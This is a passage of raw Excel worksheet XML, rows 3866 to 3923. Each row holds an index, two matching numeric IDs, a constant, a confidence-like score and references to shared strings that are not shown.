      <c r="H3866" t="s">
        <v>7647</v>
      </c>
    </row>
    <row r="3867" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3867" s="1">
        <v>3865</v>
      </c>
      <c r="B3867">
        <v>7249</v>
      </c>
      <c r="C3867">
        <v>7249</v>
      </c>
      <c r="D3867">
        <v>2</v>
      </c>
      <c r="E3867">
        <v>0.96950000524520874</v>
      </c>
      <c r="F3867" t="s">
        <v>5592</v>
      </c>
      <c r="G3867" t="s">
        <v>7648</v>
      </c>
      <c r="H3867" t="s">
        <v>7649</v>
      </c>
    </row>
    <row r="3868" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3868" s="1">
        <v>3866</v>
      </c>
      <c r="B3868">
        <v>1494</v>
      </c>
      <c r="C3868">
        <v>1494</v>
      </c>
      <c r="D3868">
        <v>2</v>
      </c>
      <c r="E3868">
        <v>0.76450002193450928</v>
      </c>
      <c r="F3868" t="s">
        <v>5592</v>
      </c>
      <c r="G3868" t="s">
        <v>7650</v>
      </c>
      <c r="H3868" t="s">
        <v>7651</v>
      </c>
    </row>
    <row r="3869" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3869" s="1">
        <v>3867</v>
      </c>
      <c r="B3869">
        <v>1874</v>
      </c>
      <c r="C3869">
        <v>1874</v>
      </c>
      <c r="D3869">
        <v>2</v>
      </c>
      <c r="E3869">
        <v>0.99580001831054688</v>
      </c>
      <c r="F3869" t="s">
        <v>5592</v>
      </c>
      <c r="G3869" t="s">
        <v>7652</v>
      </c>
      <c r="H3869" t="s">
        <v>7653</v>
      </c>
    </row>
    <row r="3870" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3870" s="1">
        <v>3868</v>
      </c>
      <c r="B3870">
        <v>1875</v>
      </c>
      <c r="C3870">
        <v>1875</v>
      </c>
      <c r="D3870">
        <v>2</v>
      </c>
      <c r="E3870">
        <v>0.97229999303817749</v>
      </c>
      <c r="F3870" t="s">
        <v>5592</v>
      </c>
      <c r="G3870" t="s">
        <v>7654</v>
      </c>
      <c r="H3870" t="s">
        <v>7655</v>
      </c>
    </row>
    <row r="3871" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3871" s="1">
        <v>3869</v>
      </c>
      <c r="B3871">
        <v>1877</v>
      </c>
      <c r="C3871">
        <v>1877</v>
      </c>
      <c r="D3871">
        <v>2</v>
      </c>
      <c r="E3871">
        <v>0.99830001592636108</v>
      </c>
      <c r="F3871" t="s">
        <v>5592</v>
      </c>
      <c r="G3871" t="s">
        <v>7656</v>
      </c>
      <c r="H3871" t="s">
        <v>7657</v>
      </c>
    </row>
    <row r="3872" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3872" s="1">
        <v>3870</v>
      </c>
      <c r="B3872">
        <v>1879</v>
      </c>
      <c r="C3872">
        <v>1879</v>
      </c>
      <c r="D3872">
        <v>2</v>
      </c>
      <c r="E3872">
        <v>0.99809998273849487</v>
      </c>
      <c r="F3872" t="s">
        <v>5592</v>
      </c>
      <c r="G3872" t="s">
        <v>7658</v>
      </c>
      <c r="H3872" t="s">
        <v>7659</v>
      </c>
    </row>
    <row r="3873" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3873" s="1">
        <v>3871</v>
      </c>
      <c r="B3873">
        <v>1880</v>
      </c>
      <c r="C3873">
        <v>1880</v>
      </c>
      <c r="D3873">
        <v>2</v>
      </c>
      <c r="E3873">
        <v>0.74900001287460327</v>
      </c>
      <c r="F3873" t="s">
        <v>5592</v>
      </c>
      <c r="G3873" t="s">
        <v>7660</v>
      </c>
      <c r="H3873" t="s">
        <v>7661</v>
      </c>
    </row>
    <row r="3874" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3874" s="1">
        <v>3872</v>
      </c>
      <c r="B3874">
        <v>7092</v>
      </c>
      <c r="C3874">
        <v>7092</v>
      </c>
      <c r="D3874">
        <v>2</v>
      </c>
      <c r="E3874">
        <v>0.98600000143051147</v>
      </c>
      <c r="F3874" t="s">
        <v>5592</v>
      </c>
      <c r="G3874" t="s">
        <v>7662</v>
      </c>
      <c r="H3874" t="s">
        <v>7663</v>
      </c>
    </row>
    <row r="3875" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3875" s="1">
        <v>3873</v>
      </c>
      <c r="B3875">
        <v>1884</v>
      </c>
      <c r="C3875">
        <v>1884</v>
      </c>
      <c r="D3875">
        <v>2</v>
      </c>
      <c r="E3875">
        <v>0.60170000791549683</v>
      </c>
      <c r="F3875" t="s">
        <v>5592</v>
      </c>
      <c r="G3875" t="s">
        <v>7664</v>
      </c>
      <c r="H3875" t="s">
        <v>7665</v>
      </c>
    </row>
    <row r="3876" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3876" s="1">
        <v>3874</v>
      </c>
      <c r="B3876">
        <v>7091</v>
      </c>
      <c r="C3876">
        <v>7091</v>
      </c>
      <c r="D3876">
        <v>2</v>
      </c>
      <c r="E3876">
        <v>0.86369997262954712</v>
      </c>
      <c r="F3876" t="s">
        <v>5592</v>
      </c>
      <c r="G3876" t="s">
        <v>7666</v>
      </c>
      <c r="H3876" t="s">
        <v>7667</v>
      </c>
    </row>
    <row r="3877" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3877" s="1">
        <v>3875</v>
      </c>
      <c r="B3877">
        <v>1890</v>
      </c>
      <c r="C3877">
        <v>1890</v>
      </c>
      <c r="D3877">
        <v>2</v>
      </c>
      <c r="E3877">
        <v>0.64649999141693115</v>
      </c>
      <c r="F3877" t="s">
        <v>5592</v>
      </c>
      <c r="G3877" t="s">
        <v>7668</v>
      </c>
      <c r="H3877" t="s">
        <v>7669</v>
      </c>
    </row>
    <row r="3878" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3878" s="1">
        <v>3876</v>
      </c>
      <c r="B3878">
        <v>1893</v>
      </c>
      <c r="C3878">
        <v>1893</v>
      </c>
      <c r="D3878">
        <v>2</v>
      </c>
      <c r="E3878">
        <v>0.78920000791549683</v>
      </c>
      <c r="F3878" t="s">
        <v>5592</v>
      </c>
      <c r="G3878" t="s">
        <v>7670</v>
      </c>
      <c r="H3878" t="s">
        <v>7671</v>
      </c>
    </row>
    <row r="3879" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3879" s="1">
        <v>3877</v>
      </c>
      <c r="B3879">
        <v>1895</v>
      </c>
      <c r="C3879">
        <v>1895</v>
      </c>
      <c r="D3879">
        <v>2</v>
      </c>
      <c r="E3879">
        <v>0.94029998779296875</v>
      </c>
      <c r="F3879" t="s">
        <v>5592</v>
      </c>
      <c r="G3879" t="s">
        <v>7672</v>
      </c>
      <c r="H3879" t="s">
        <v>7673</v>
      </c>
    </row>
    <row r="3880" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3880" s="1">
        <v>3878</v>
      </c>
      <c r="B3880">
        <v>7089</v>
      </c>
      <c r="C3880">
        <v>7089</v>
      </c>
      <c r="D3880">
        <v>2</v>
      </c>
      <c r="E3880">
        <v>0.86710000038146973</v>
      </c>
      <c r="F3880" t="s">
        <v>5592</v>
      </c>
      <c r="G3880" t="s">
        <v>7674</v>
      </c>
      <c r="H3880" t="s">
        <v>7675</v>
      </c>
    </row>
    <row r="3881" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3881" s="1">
        <v>3879</v>
      </c>
      <c r="B3881">
        <v>7088</v>
      </c>
      <c r="C3881">
        <v>7088</v>
      </c>
      <c r="D3881">
        <v>2</v>
      </c>
      <c r="E3881">
        <v>0.5065000057220459</v>
      </c>
      <c r="F3881" t="s">
        <v>5592</v>
      </c>
      <c r="G3881" t="s">
        <v>7676</v>
      </c>
      <c r="H3881" t="s">
        <v>7677</v>
      </c>
    </row>
    <row r="3882" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3882" s="1">
        <v>3880</v>
      </c>
      <c r="B3882">
        <v>1904</v>
      </c>
      <c r="C3882">
        <v>1904</v>
      </c>
      <c r="D3882">
        <v>2</v>
      </c>
      <c r="E3882">
        <v>0.50620001554489136</v>
      </c>
      <c r="F3882" t="s">
        <v>5592</v>
      </c>
      <c r="G3882" t="s">
        <v>7678</v>
      </c>
      <c r="H3882" t="s">
        <v>7679</v>
      </c>
    </row>
    <row r="3883" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3883" s="1">
        <v>3881</v>
      </c>
      <c r="B3883">
        <v>1905</v>
      </c>
      <c r="C3883">
        <v>1905</v>
      </c>
      <c r="D3883">
        <v>2</v>
      </c>
      <c r="E3883">
        <v>0.93949997425079346</v>
      </c>
      <c r="F3883" t="s">
        <v>5592</v>
      </c>
      <c r="G3883" t="s">
        <v>7680</v>
      </c>
      <c r="H3883" t="s">
        <v>7681</v>
      </c>
    </row>
    <row r="3884" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3884" s="1">
        <v>3882</v>
      </c>
      <c r="B3884">
        <v>1906</v>
      </c>
      <c r="C3884">
        <v>1906</v>
      </c>
      <c r="D3884">
        <v>2</v>
      </c>
      <c r="E3884">
        <v>0.99919998645782471</v>
      </c>
      <c r="F3884" t="s">
        <v>5592</v>
      </c>
      <c r="G3884" t="s">
        <v>7682</v>
      </c>
      <c r="H3884" t="s">
        <v>7683</v>
      </c>
    </row>
    <row r="3885" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3885" s="1">
        <v>3883</v>
      </c>
      <c r="B3885">
        <v>1907</v>
      </c>
      <c r="C3885">
        <v>1907</v>
      </c>
      <c r="D3885">
        <v>2</v>
      </c>
      <c r="E3885">
        <v>0.99919998645782471</v>
      </c>
      <c r="F3885" t="s">
        <v>5592</v>
      </c>
      <c r="G3885" t="s">
        <v>7684</v>
      </c>
      <c r="H3885" t="s">
        <v>7683</v>
      </c>
    </row>
    <row r="3886" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3886" s="1">
        <v>3884</v>
      </c>
      <c r="B3886">
        <v>1908</v>
      </c>
      <c r="C3886">
        <v>1908</v>
      </c>
      <c r="D3886">
        <v>2</v>
      </c>
      <c r="E3886">
        <v>0.86140000820159912</v>
      </c>
      <c r="F3886" t="s">
        <v>5592</v>
      </c>
      <c r="G3886" t="s">
        <v>7685</v>
      </c>
      <c r="H3886" t="s">
        <v>7686</v>
      </c>
    </row>
    <row r="3887" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3887" s="1">
        <v>3885</v>
      </c>
      <c r="B3887">
        <v>7084</v>
      </c>
      <c r="C3887">
        <v>7084</v>
      </c>
      <c r="D3887">
        <v>2</v>
      </c>
      <c r="E3887">
        <v>0.98229998350143433</v>
      </c>
      <c r="F3887" t="s">
        <v>5592</v>
      </c>
      <c r="G3887" t="s">
        <v>7687</v>
      </c>
      <c r="H3887" t="s">
        <v>7688</v>
      </c>
    </row>
    <row r="3888" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3888" s="1">
        <v>3886</v>
      </c>
      <c r="B3888">
        <v>7071</v>
      </c>
      <c r="C3888">
        <v>7071</v>
      </c>
      <c r="D3888">
        <v>2</v>
      </c>
      <c r="E3888">
        <v>0.61330002546310425</v>
      </c>
      <c r="F3888" t="s">
        <v>5592</v>
      </c>
      <c r="G3888" t="s">
        <v>7689</v>
      </c>
      <c r="H3888" t="s">
        <v>6967</v>
      </c>
    </row>
    <row r="3889" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3889" s="1">
        <v>3887</v>
      </c>
      <c r="B3889">
        <v>1933</v>
      </c>
      <c r="C3889">
        <v>1933</v>
      </c>
      <c r="D3889">
        <v>2</v>
      </c>
      <c r="E3889">
        <v>0.87389999628067017</v>
      </c>
      <c r="F3889" t="s">
        <v>5592</v>
      </c>
      <c r="G3889" t="s">
        <v>7690</v>
      </c>
      <c r="H3889" t="s">
        <v>7691</v>
      </c>
    </row>
    <row r="3890" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3890" s="1">
        <v>3888</v>
      </c>
      <c r="B3890">
        <v>1873</v>
      </c>
      <c r="C3890">
        <v>1873</v>
      </c>
      <c r="D3890">
        <v>2</v>
      </c>
      <c r="E3890">
        <v>0.98949998617172241</v>
      </c>
      <c r="F3890" t="s">
        <v>5592</v>
      </c>
      <c r="G3890" t="s">
        <v>7692</v>
      </c>
      <c r="H3890" t="s">
        <v>7693</v>
      </c>
    </row>
    <row r="3891" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3891" s="1">
        <v>3889</v>
      </c>
      <c r="B3891">
        <v>1867</v>
      </c>
      <c r="C3891">
        <v>1867</v>
      </c>
      <c r="D3891">
        <v>2</v>
      </c>
      <c r="E3891">
        <v>0.84719997644424438</v>
      </c>
      <c r="F3891" t="s">
        <v>5592</v>
      </c>
      <c r="G3891" t="s">
        <v>7694</v>
      </c>
      <c r="H3891" t="s">
        <v>7695</v>
      </c>
    </row>
    <row r="3892" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3892" s="1">
        <v>3890</v>
      </c>
      <c r="B3892">
        <v>1866</v>
      </c>
      <c r="C3892">
        <v>1866</v>
      </c>
      <c r="D3892">
        <v>2</v>
      </c>
      <c r="E3892">
        <v>0.49129998683929438</v>
      </c>
      <c r="F3892" t="s">
        <v>5592</v>
      </c>
      <c r="G3892" t="s">
        <v>7696</v>
      </c>
      <c r="H3892" t="s">
        <v>7697</v>
      </c>
    </row>
    <row r="3893" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3893" s="1">
        <v>3891</v>
      </c>
      <c r="B3893">
        <v>1864</v>
      </c>
      <c r="C3893">
        <v>1864</v>
      </c>
      <c r="D3893">
        <v>2</v>
      </c>
      <c r="E3893">
        <v>0.98559999465942383</v>
      </c>
      <c r="F3893" t="s">
        <v>5592</v>
      </c>
      <c r="G3893" t="s">
        <v>7698</v>
      </c>
      <c r="H3893" t="s">
        <v>7699</v>
      </c>
    </row>
    <row r="3894" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3894" s="1">
        <v>3892</v>
      </c>
      <c r="B3894">
        <v>1816</v>
      </c>
      <c r="C3894">
        <v>1816</v>
      </c>
      <c r="D3894">
        <v>2</v>
      </c>
      <c r="E3894">
        <v>0.42410001158714289</v>
      </c>
      <c r="F3894" t="s">
        <v>5592</v>
      </c>
      <c r="G3894" t="s">
        <v>7700</v>
      </c>
      <c r="H3894" t="s">
        <v>7701</v>
      </c>
    </row>
    <row r="3895" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3895" s="1">
        <v>3893</v>
      </c>
      <c r="B3895">
        <v>1819</v>
      </c>
      <c r="C3895">
        <v>1819</v>
      </c>
      <c r="D3895">
        <v>2</v>
      </c>
      <c r="E3895">
        <v>0.5439000129699707</v>
      </c>
      <c r="F3895" t="s">
        <v>5592</v>
      </c>
      <c r="G3895" t="s">
        <v>7702</v>
      </c>
      <c r="H3895" t="s">
        <v>7703</v>
      </c>
    </row>
    <row r="3896" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3896" s="1">
        <v>3894</v>
      </c>
      <c r="B3896">
        <v>1821</v>
      </c>
      <c r="C3896">
        <v>1821</v>
      </c>
      <c r="D3896">
        <v>2</v>
      </c>
      <c r="E3896">
        <v>0.51529997587203979</v>
      </c>
      <c r="F3896" t="s">
        <v>5592</v>
      </c>
      <c r="G3896" t="s">
        <v>7704</v>
      </c>
      <c r="H3896" t="s">
        <v>7705</v>
      </c>
    </row>
    <row r="3897" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3897" s="1">
        <v>3895</v>
      </c>
      <c r="B3897">
        <v>1823</v>
      </c>
      <c r="C3897">
        <v>1823</v>
      </c>
      <c r="D3897">
        <v>2</v>
      </c>
      <c r="E3897">
        <v>0.99879997968673706</v>
      </c>
      <c r="F3897" t="s">
        <v>5592</v>
      </c>
      <c r="G3897" t="s">
        <v>7706</v>
      </c>
      <c r="H3897" t="s">
        <v>7707</v>
      </c>
    </row>
    <row r="3898" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3898" s="1">
        <v>3896</v>
      </c>
      <c r="B3898">
        <v>7107</v>
      </c>
      <c r="C3898">
        <v>7107</v>
      </c>
      <c r="D3898">
        <v>2</v>
      </c>
      <c r="E3898">
        <v>0.51090002059936523</v>
      </c>
      <c r="F3898" t="s">
        <v>5592</v>
      </c>
      <c r="G3898" t="s">
        <v>7708</v>
      </c>
      <c r="H3898" t="s">
        <v>7709</v>
      </c>
    </row>
    <row r="3899" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3899" s="1">
        <v>3897</v>
      </c>
      <c r="B3899">
        <v>3655</v>
      </c>
      <c r="C3899">
        <v>3655</v>
      </c>
      <c r="D3899">
        <v>2</v>
      </c>
      <c r="E3899">
        <v>0.99879997968673706</v>
      </c>
      <c r="F3899" t="s">
        <v>5592</v>
      </c>
      <c r="G3899" t="s">
        <v>7710</v>
      </c>
      <c r="H3899" t="s">
        <v>7711</v>
      </c>
    </row>
    <row r="3900" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3900" s="1">
        <v>3898</v>
      </c>
      <c r="B3900">
        <v>7105</v>
      </c>
      <c r="C3900">
        <v>7105</v>
      </c>
      <c r="D3900">
        <v>2</v>
      </c>
      <c r="E3900">
        <v>0.99699997901916504</v>
      </c>
      <c r="F3900" t="s">
        <v>5592</v>
      </c>
      <c r="G3900" t="s">
        <v>7712</v>
      </c>
      <c r="H3900" t="s">
        <v>7713</v>
      </c>
    </row>
    <row r="3901" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3901" s="1">
        <v>3899</v>
      </c>
      <c r="B3901">
        <v>1829</v>
      </c>
      <c r="C3901">
        <v>1829</v>
      </c>
      <c r="D3901">
        <v>2</v>
      </c>
      <c r="E3901">
        <v>0.65170001983642578</v>
      </c>
      <c r="F3901" t="s">
        <v>5592</v>
      </c>
      <c r="G3901" t="s">
        <v>7714</v>
      </c>
      <c r="H3901" t="s">
        <v>7715</v>
      </c>
    </row>
    <row r="3902" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3902" s="1">
        <v>3900</v>
      </c>
      <c r="B3902">
        <v>7104</v>
      </c>
      <c r="C3902">
        <v>7104</v>
      </c>
      <c r="D3902">
        <v>2</v>
      </c>
      <c r="E3902">
        <v>0.99370002746582031</v>
      </c>
      <c r="F3902" t="s">
        <v>5592</v>
      </c>
      <c r="G3902" t="s">
        <v>7716</v>
      </c>
      <c r="H3902" t="s">
        <v>7717</v>
      </c>
    </row>
    <row r="3903" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3903" s="1">
        <v>3901</v>
      </c>
      <c r="B3903">
        <v>7103</v>
      </c>
      <c r="C3903">
        <v>7103</v>
      </c>
      <c r="D3903">
        <v>2</v>
      </c>
      <c r="E3903">
        <v>0.82810002565383911</v>
      </c>
      <c r="F3903" t="s">
        <v>5592</v>
      </c>
      <c r="G3903" t="s">
        <v>7718</v>
      </c>
      <c r="H3903" t="s">
        <v>7719</v>
      </c>
    </row>
    <row r="3904" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3904" s="1">
        <v>3902</v>
      </c>
      <c r="B3904">
        <v>1934</v>
      </c>
      <c r="C3904">
        <v>1934</v>
      </c>
      <c r="D3904">
        <v>2</v>
      </c>
      <c r="E3904">
        <v>0.63410001993179321</v>
      </c>
      <c r="F3904" t="s">
        <v>5592</v>
      </c>
      <c r="G3904" t="s">
        <v>7720</v>
      </c>
      <c r="H3904" t="s">
        <v>7197</v>
      </c>
    </row>
    <row r="3905" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3905" s="1">
        <v>3903</v>
      </c>
      <c r="B3905">
        <v>7102</v>
      </c>
      <c r="C3905">
        <v>7102</v>
      </c>
      <c r="D3905">
        <v>2</v>
      </c>
      <c r="E3905">
        <v>0.98420000076293945</v>
      </c>
      <c r="F3905" t="s">
        <v>5592</v>
      </c>
      <c r="G3905" t="s">
        <v>7721</v>
      </c>
      <c r="H3905" t="s">
        <v>7722</v>
      </c>
    </row>
    <row r="3906" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3906" s="1">
        <v>3904</v>
      </c>
      <c r="B3906">
        <v>7101</v>
      </c>
      <c r="C3906">
        <v>7101</v>
      </c>
      <c r="D3906">
        <v>2</v>
      </c>
      <c r="E3906">
        <v>0.99949997663497925</v>
      </c>
      <c r="F3906" t="s">
        <v>5592</v>
      </c>
      <c r="G3906" t="s">
        <v>7723</v>
      </c>
      <c r="H3906" t="s">
        <v>7724</v>
      </c>
    </row>
    <row r="3907" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3907" s="1">
        <v>3905</v>
      </c>
      <c r="B3907">
        <v>1845</v>
      </c>
      <c r="C3907">
        <v>1845</v>
      </c>
      <c r="D3907">
        <v>2</v>
      </c>
      <c r="E3907">
        <v>0.98350000381469727</v>
      </c>
      <c r="F3907" t="s">
        <v>5592</v>
      </c>
      <c r="G3907" t="s">
        <v>7725</v>
      </c>
      <c r="H3907" t="s">
        <v>7726</v>
      </c>
    </row>
    <row r="3908" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3908" s="1">
        <v>3906</v>
      </c>
      <c r="B3908">
        <v>1847</v>
      </c>
      <c r="C3908">
        <v>1847</v>
      </c>
      <c r="D3908">
        <v>2</v>
      </c>
      <c r="E3908">
        <v>0.94800001382827759</v>
      </c>
      <c r="F3908" t="s">
        <v>5592</v>
      </c>
      <c r="G3908" t="s">
        <v>7727</v>
      </c>
      <c r="H3908" t="s">
        <v>7728</v>
      </c>
    </row>
    <row r="3909" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3909" s="1">
        <v>3907</v>
      </c>
      <c r="B3909">
        <v>1848</v>
      </c>
      <c r="C3909">
        <v>1848</v>
      </c>
      <c r="D3909">
        <v>2</v>
      </c>
      <c r="E3909">
        <v>0.54500001668930054</v>
      </c>
      <c r="F3909" t="s">
        <v>5592</v>
      </c>
      <c r="G3909" t="s">
        <v>7729</v>
      </c>
      <c r="H3909" t="s">
        <v>7730</v>
      </c>
    </row>
    <row r="3910" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3910" s="1">
        <v>3908</v>
      </c>
      <c r="B3910">
        <v>1849</v>
      </c>
      <c r="C3910">
        <v>1849</v>
      </c>
      <c r="D3910">
        <v>2</v>
      </c>
      <c r="E3910">
        <v>0.94179999828338623</v>
      </c>
      <c r="F3910" t="s">
        <v>5592</v>
      </c>
      <c r="G3910" t="s">
        <v>7731</v>
      </c>
      <c r="H3910" t="s">
        <v>7732</v>
      </c>
    </row>
    <row r="3911" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3911" s="1">
        <v>3909</v>
      </c>
      <c r="B3911">
        <v>1850</v>
      </c>
      <c r="C3911">
        <v>1850</v>
      </c>
      <c r="D3911">
        <v>2</v>
      </c>
      <c r="E3911">
        <v>0.8529999852180481</v>
      </c>
      <c r="F3911" t="s">
        <v>5592</v>
      </c>
      <c r="G3911" t="s">
        <v>7733</v>
      </c>
      <c r="H3911" t="s">
        <v>7734</v>
      </c>
    </row>
    <row r="3912" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3912" s="1">
        <v>3910</v>
      </c>
      <c r="B3912">
        <v>7096</v>
      </c>
      <c r="C3912">
        <v>7096</v>
      </c>
      <c r="D3912">
        <v>2</v>
      </c>
      <c r="E3912">
        <v>0.84600001573562622</v>
      </c>
      <c r="F3912" t="s">
        <v>5592</v>
      </c>
      <c r="G3912" t="s">
        <v>7735</v>
      </c>
      <c r="H3912" t="s">
        <v>7736</v>
      </c>
    </row>
    <row r="3913" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3913" s="1">
        <v>3911</v>
      </c>
      <c r="B3913">
        <v>1854</v>
      </c>
      <c r="C3913">
        <v>1854</v>
      </c>
      <c r="D3913">
        <v>2</v>
      </c>
      <c r="E3913">
        <v>0.5820000171661377</v>
      </c>
      <c r="F3913" t="s">
        <v>5592</v>
      </c>
      <c r="G3913" t="s">
        <v>7737</v>
      </c>
      <c r="H3913" t="s">
        <v>7738</v>
      </c>
    </row>
    <row r="3914" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3914" s="1">
        <v>3912</v>
      </c>
      <c r="B3914">
        <v>7095</v>
      </c>
      <c r="C3914">
        <v>7095</v>
      </c>
      <c r="D3914">
        <v>2</v>
      </c>
      <c r="E3914">
        <v>0.81129997968673706</v>
      </c>
      <c r="F3914" t="s">
        <v>5592</v>
      </c>
      <c r="G3914" t="s">
        <v>7739</v>
      </c>
      <c r="H3914" t="s">
        <v>7740</v>
      </c>
    </row>
    <row r="3915" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3915" s="1">
        <v>3913</v>
      </c>
      <c r="B3915">
        <v>1863</v>
      </c>
      <c r="C3915">
        <v>1863</v>
      </c>
      <c r="D3915">
        <v>2</v>
      </c>
      <c r="E3915">
        <v>0.97039997577667236</v>
      </c>
      <c r="F3915" t="s">
        <v>5592</v>
      </c>
      <c r="G3915" t="s">
        <v>7741</v>
      </c>
      <c r="H3915" t="s">
        <v>7742</v>
      </c>
    </row>
    <row r="3916" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3916" s="1">
        <v>3914</v>
      </c>
      <c r="B3916">
        <v>1836</v>
      </c>
      <c r="C3916">
        <v>1836</v>
      </c>
      <c r="D3916">
        <v>2</v>
      </c>
      <c r="E3916">
        <v>0.42089998722076422</v>
      </c>
      <c r="F3916" t="s">
        <v>5592</v>
      </c>
      <c r="G3916" t="s">
        <v>7743</v>
      </c>
      <c r="H3916" t="s">
        <v>7744</v>
      </c>
    </row>
    <row r="3917" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3917" s="1">
        <v>3915</v>
      </c>
      <c r="B3917">
        <v>7070</v>
      </c>
      <c r="C3917">
        <v>7070</v>
      </c>
      <c r="D3917">
        <v>2</v>
      </c>
      <c r="E3917">
        <v>0.80650001764297485</v>
      </c>
      <c r="F3917" t="s">
        <v>5592</v>
      </c>
      <c r="G3917" t="s">
        <v>7745</v>
      </c>
      <c r="H3917" t="s">
        <v>7746</v>
      </c>
    </row>
    <row r="3918" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3918" s="1">
        <v>3916</v>
      </c>
      <c r="B3918">
        <v>1936</v>
      </c>
      <c r="C3918">
        <v>1936</v>
      </c>
      <c r="D3918">
        <v>2</v>
      </c>
      <c r="E3918">
        <v>0.60110002756118774</v>
      </c>
      <c r="F3918" t="s">
        <v>5592</v>
      </c>
      <c r="G3918" t="s">
        <v>7747</v>
      </c>
      <c r="H3918" t="s">
        <v>7748</v>
      </c>
    </row>
    <row r="3919" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3919" s="1">
        <v>3917</v>
      </c>
      <c r="B3919">
        <v>7069</v>
      </c>
      <c r="C3919">
        <v>7069</v>
      </c>
      <c r="D3919">
        <v>2</v>
      </c>
      <c r="E3919">
        <v>0.86419999599456787</v>
      </c>
      <c r="F3919" t="s">
        <v>5592</v>
      </c>
      <c r="G3919" t="s">
        <v>7749</v>
      </c>
      <c r="H3919" t="s">
        <v>7750</v>
      </c>
    </row>
    <row r="3920" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3920" s="1">
        <v>3918</v>
      </c>
      <c r="B3920">
        <v>2026</v>
      </c>
      <c r="C3920">
        <v>2026</v>
      </c>
      <c r="D3920">
        <v>2</v>
      </c>
      <c r="E3920">
        <v>0.93620002269744873</v>
      </c>
      <c r="F3920" t="s">
        <v>5592</v>
      </c>
      <c r="G3920" t="s">
        <v>7751</v>
      </c>
      <c r="H3920" t="s">
        <v>7752</v>
      </c>
    </row>
    <row r="3921" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3921" s="1">
        <v>3919</v>
      </c>
      <c r="B3921">
        <v>7028</v>
      </c>
      <c r="C3921">
        <v>7028</v>
      </c>
      <c r="D3921">
        <v>2</v>
      </c>
      <c r="E3921">
        <v>0.98559999465942383</v>
      </c>
      <c r="F3921" t="s">
        <v>5592</v>
      </c>
      <c r="G3921" t="s">
        <v>7753</v>
      </c>
      <c r="H3921" t="s">
        <v>7754</v>
      </c>
    </row>
    <row r="3922" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3922" s="1">
        <v>3920</v>
      </c>
      <c r="B3922">
        <v>7026</v>
      </c>
      <c r="C3922">
        <v>7026</v>
      </c>
      <c r="D3922">
        <v>2</v>
      </c>
      <c r="E3922">
        <v>0.68409997224807739</v>
      </c>
      <c r="F3922" t="s">
        <v>5592</v>
      </c>
      <c r="G3922" t="s">
        <v>7755</v>
      </c>
      <c r="H3922" t="s">
        <v>7756</v>
      </c>
    </row>
    <row r="3923" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3923" s="1">
        <v>3921</v>
      </c>
      <c r="B3923">
        <v>7024</v>
      </c>
      <c r="C3923">
        <v>7024</v>
      </c>
      <c r="D3923">
        <v>2</v>
      </c>
      <c r="E3923">
        <v>0.78589999675750732</v>
      </c>
      <c r="F3923" t="s">
        <v>5592</v>
      </c>
      <c r="G3923" t="s">
        <v>7757</v>
      </c>
      <c r="H3923" t="s">
        <v>7758</v>
      </c>
    </row>
    <row r="3924" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3924" s="1">
        <v>3922</v>
      </c>
      <c r="B3924">
        <v>2050</v>
      </c>
      <c r="C3924">
        <v>2050</v>
      </c>
      <c r="D3924">
        <v>2</v>
      </c>
      <c r="E3924">
        <v>0.47470000386238098</v>
      </c>
      <c r="F3924" t="s">
        <v>5592</v>
      </c>
      <c r="G3924" t="s">
        <v>7759</v>
      </c>
      <c r="H3924" t="s">
        <v>7760</v>
      </c>
    </row>
    <row r="3925" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3925" s="1">
        <v>3923</v>
      </c>
